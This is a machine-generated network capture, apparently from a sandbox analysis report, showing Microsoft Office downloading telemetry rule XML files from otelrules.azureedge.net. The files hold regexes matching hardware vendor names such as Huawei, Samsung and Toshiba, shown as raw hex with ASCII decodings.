                                                                                                                                      2024-10-07 01:23:02 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      32192.168.2.44976613.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:02 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:02 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 419
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                      ETag: "0x8DC582BB32BB5CB"
                                                                                                                                      x-ms-request-id: d415a278-e01e-0051-6efe-1684b2000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012302Z-1657d5bbd48xsz2nuzq4vfrzg800000002rg000000003g39
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:02 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      33192.168.2.44977113.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:03 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:03 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 486
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                      ETag: "0x8DC582B92FCB436"
                                                                                                                                      x-ms-request-id: 92e59db7-001e-002b-6700-1799f2000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012303Z-1657d5bbd48brl8we3nu8cxwgn00000002zg00000000ubmd
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:03 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      34192.168.2.44977013.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:03 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:03 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 427
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                      ETag: "0x8DC582BA909FA21"
                                                                                                                                      x-ms-request-id: a62739ea-301e-005d-6402-17e448000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012303Z-1657d5bbd487nf59mzf5b3gk8n00000002fg000000004xf3
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:03 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      35192.168.2.44976913.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:03 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:03 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 472
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                      ETag: "0x8DC582B9D43097E"
                                                                                                                                      x-ms-request-id: b27116a7-a01e-003d-3a00-1798d7000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012303Z-1657d5bbd48p2j6x2quer0q02800000002zg00000000bwx1
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:03 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      36192.168.2.44976813.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:03 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:03 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 420
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                      ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                      x-ms-request-id: 4c0632d0-601e-0097-4413-17f33a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012303Z-1657d5bbd48xdq5dkwwugdpzr00000000350000000006zd2
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:03 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      37192.168.2.44977213.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:03 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:03 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 423
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                      ETag: "0x8DC582BB7564CE8"
                                                                                                                                      x-ms-request-id: a2d01d3c-801e-0083-4800-17f0ae000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012303Z-1657d5bbd48xdq5dkwwugdpzr0000000035g000000004t58
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:03 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      38192.168.2.44977313.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:04 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:04 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 478
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                      ETag: "0x8DC582B9B233827"
                                                                                                                                      x-ms-request-id: 4dd19665-401e-005b-7705-179c0c000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012304Z-1657d5bbd48cpbzgkvtewk0wu000000002zg000000000557
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:04 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      39192.168.2.44977513.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:04 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:04 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 468
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                      ETag: "0x8DC582BB046B576"
                                                                                                                                      x-ms-request-id: db28b7eb-d01e-0065-5efe-16b77a000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012304Z-1657d5bbd48tqvfc1ysmtbdrg000000002n000000000f0wg
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:04 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      40192.168.2.44977413.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:04 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:04 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 404
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                      ETag: "0x8DC582B95C61A3C"
                                                                                                                                      x-ms-request-id: 151ca1e1-401e-0029-2b03-179b43000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012304Z-1657d5bbd48xsz2nuzq4vfrzg800000002s00000000015yh
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:04 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      41192.168.2.44977613.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:04 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:04 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 400
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                      ETag: "0x8DC582BB2D62837"
                                                                                                                                      x-ms-request-id: 53f69819-801e-0048-7802-17f3fb000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012304Z-1657d5bbd48cpbzgkvtewk0wu000000002xg000000006zvm
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
